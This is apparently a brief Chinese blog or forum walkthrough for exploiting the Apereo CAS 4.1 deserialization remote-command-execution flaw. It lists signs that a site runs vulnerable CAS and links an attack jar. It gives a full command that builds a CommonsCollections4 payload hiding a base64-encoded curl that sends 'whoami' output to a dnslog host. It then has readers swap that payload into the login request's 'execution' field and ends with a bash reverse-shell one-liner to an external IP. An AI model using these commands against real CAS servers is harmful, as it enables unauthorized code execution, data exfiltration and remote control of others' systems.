楼主困了,这里就直接写上楼主自己的一些操作
详细过程可以看Apereo CAS 4.1 反序列化命令执行漏洞复现
特征:
1、网站根目录下有cas目录
2、如图所示,有apereo CAS图标
3、如图所示,有execution传参
一、先跑下目录
二、生成payload
http://www.jackson-t.ca/runtime-exec-payloads.html
工具链接:https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-1.0-SNAPSHOT-all.jar
三、dnslog回显
java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "bash -c {echo,Y3VybCBgd2hvYW1pYC45dzJ3Z2YuZG5zbG9nLmNu}|{base64,-d}|{bash,-i}"
标记部分就是生成的payload
然后我们登录CAS并抓包,将Body中的execution值替换成上面生成的Payload发送:
成功回显
五、反弹shell
和第四步一样的
把这个拿去编码后,替换,发包
bash -i >& /dev/tcp/192.168.100.34/2233 0>&1
成功反弹
